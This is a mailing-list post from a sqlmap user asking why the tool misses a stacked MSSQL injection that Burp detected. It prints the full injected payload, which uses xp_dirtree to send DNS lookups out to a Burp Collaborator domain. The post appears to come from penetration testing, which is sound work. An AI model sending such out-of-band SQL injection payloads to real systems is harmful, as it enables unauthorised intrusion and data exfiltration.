[sqlmap-users] Sqlmap/DNS exfil
From: Mark M. <vv...@ho...> - 2016-12-19 22:03:51

I have a situation where Burp has detected the following DNS exfiltration injection for a query parameter in a web app:

    GET /XXXX/Store/Page.aspx?ProductCategory=45'%3bdeclare%20@q%20varchar(99)%3bset%20@q%3d'\\q8zg3ptwdhvp9ep7ppaxdfvpngt9uxlo9fw5ku.burpcollab'%2b'orator.net\rtf'%3b%20exec%20master.dbo.xp_dirtree%20@q%3b--%20 HTTP/1.1

To make that a little easier to read, the injected value is:

    ';declare @q varchar(99);set @q='\\q8zg3ptwdhvp9ep7ppaxdfvpngt9uxlo9fw5ku.burpcollab'+'orator.net\rtf'; exec master.dbo.xp_dirtree @q;--

I've modified the domain and verified that I receive the DNS requests on my local DNS server (the domain which I provide to sqlmap using the --dns-domain=xxx option) when the injection is manually sent to the page.

The problem is, when I pass the request to sqlmap it's not detecting that there's an injection at all. I've provided the OS/DBMS and --level 5, but still no dice. I'm using sqlmap v1.0.12#stable.

Since I've gotten many other injections to work in the past, I believe that I'm using sqlmap properly (formatting my request in a file appropriately, specifying the correct parameter to test, etc.) However, it surprised me that what appeared to be a fairly straight-forward stacked SQL injection would slip by all of sqlmap's tests.

Is there a way to force sqlmap to try DNS exfiltration injections despite no other injection technique succeeding?

Thanks
V